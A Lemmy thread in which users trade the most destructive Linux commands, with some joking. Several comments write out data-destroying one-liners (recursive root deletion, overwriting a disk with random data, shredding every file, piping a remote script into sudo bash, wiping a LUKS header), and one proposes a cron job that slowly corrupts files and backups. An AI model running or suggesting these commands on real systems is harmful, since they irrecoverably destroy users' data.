• WetFerret@lemmy.world
    link
    fedilink
    arrow-up
    60
    ·
    1 year ago

    Many people have given great suggestions for the most destroying commands, but most result in an immediately borked system. While inconvenient, that doesn’t have a lasting impact on users who have backups.

    I propose writing a bash script set up to run daily in cron, which picks a random file in the user’s home directory tree and randomizes just a few bytes of data in the file. The script doesn’t immediately damage the basic OS functionality, and the data degradation is so slow that by the time the user realizes something fishy is going on a lot of their documents, media, and hopefully a few months worth of backups will have been corrupted.

  • LKC@sh.itjust.works
    link
    fedilink
    arrow-up
    54
    arrow-down
    1
    ·
    1 year ago

    If you allow root privileges, there is:

    sudo rm -rf --no-preserve-root /

    If you want to be malicious:

    sudo dd if=/dev/urandom of=/dev/sdX

    or

    sudo find / -exec shred -u {} \;

    • oriond@lemmy.mlOP
      link
      fedilink
      arrow-up
      1
      ·
      1 year ago

      What does this do? nobody can read any file? would sudo chmod 777 fix it at least to a usable system?

      • Ruscal@sh.itjust.works
        link
        fedilink
        arrow-up
        6
        ·
        1 year ago

        The trick is that you loose access to every file on the system. chmod is also a file. And ls. And sudo. You see where it’s going. System will kinda work after this command, but rebooting (which by a coincidence is a common action for “fixing” things) will reveal that system is dead.

    • Carighan Maconar@lemmy.world
      link
      fedilink
      arrow-up
      12
      ·
      1 year ago

      Everyone else talking about how to shred files or even the BIOS is missing a big leap, yeah. Not just destroying the computer: destroying the person in front of it! And vim is happy to provide. 😅

    • TopRamenBinLaden@sh.itjust.works
      link
      fedilink
      English
      arrow-up
      2
      ·
      1 year ago

      True, just entering vim on a pc for a user who doesn’t know about vim’s existence is basically a prison sentence. They will literally be trapped in vim hell until they power down their PC.

      • electric_nan@lemmy.ml
        link
        fedilink
        arrow-up
        2
        ·
        1 year ago

        I once entered vim into a computer. I couldn’t exit. I tried unplugging the computer but vim persisted. I took it to the dump, where I assume vim is still running to this very day.

  • MuchPineapples@lemmy.world
    link
    fedilink
    arrow-up
    26
    arrow-down
    1
    ·
    edit-2
    1 year ago

    Everyone is deleting data, but with proper backups that’s not a problem. How about:

    curl insert_url_here | sudo bash

    This can really mess up your life.

    Even if the script isn’t malicious, if the internet drops out halfway the download you might end up with a “rm -r /”, or similar, command.

  • zephyr@lemmy.world
    link
    fedilink
    arrow-up
    18
    ·
    edit-2
    1 year ago

    Everyone is talking about rm -rf / and damage to storage drives, but I read somewhere about EFI variables having something to do with bricking the computer. If this is possible, then it’s a lot more damage than just disk drives.

    Edit: this is interesting SE post https://superuser.com/questions/313850

    • grabyourmotherskeys@lemmy.world
      link
      fedilink
      arrow-up
      2
      arrow-down
      1
      ·
      1 year ago

      I did have RH Linux die while updating core libs a very long time ago. It deleted them and the system shut down. No reboot possible. I eventually (like later that day) copied a set of libs from another rh system and was able to boot and recover.

      Never used rh by choice again after that.

  • nodsocket@lemmy.world
    link
    fedilink
    arrow-up
    19
    arrow-down
    5
    ·
    edit-2
    1 year ago

    ./self_destruct.sh

    Assuming you have a script that triggers explosives to destroy your computer.

    • slazer2au@lemmy.world
      link
      fedilink
      English
      arrow-up
      5
      ·
      1 year ago

      Reminds me of those Defcon talks where they discover it’s really hard to pack a HDD killing device into a 2ru server.

  • oriond@lemmy.mlOP
    link
    fedilink
    arrow-up
    5
    ·
    edit-2
    1 year ago

    I can’t remember but having my hard drive encrypted, I believe there is a single file that messing with it would render the drive not decryptable.

    • nodsocket@lemmy.world
      link
      fedilink
      arrow-up
      10
      ·
      1 year ago

      The LUKS headers. If those are corrupted you can’t decrypt the drive. The good news is that you can back up the headers to prevent that from happening.

      • waigl@lemmy.world
        link
        fedilink
        English
        arrow-up
        4
        ·
        1 year ago

        Those aren’t files, though, they are just some sectors on your block device. Sure, if you mess with those, your ability to decrypt your disk goes out the window, but then, when was bypassing the filesystem and messing with bits on your disk directly ever safe?

        It’s possible he was using an encrypted key file instead of just a password for that extra strong security. In that case, of course, if you lose that file, kiss your data good bye.

    • oriond@lemmy.mlOP
      link
      fedilink
      arrow-up
      1
      ·
      edit-2
      1 year ago

      Here is the command that will render a LUKS encrypted device un recoverable
      From the documentation.

      5.4 How do I securely erase a LUKS container?

      For LUKS, if you are in a desperate hurry, overwrite the LUKS header and key-slot area. For LUKS1 and LUKS2, just be generous and overwrite the first 100MB. A single overwrite with zeros should be enough. If you anticipate being in a desperate hurry, prepare the command beforehand. Example with /dev/sde1 as the LUKS partition and default parameters:

      head -c 100000000 /dev/zero > /dev/sde1; sync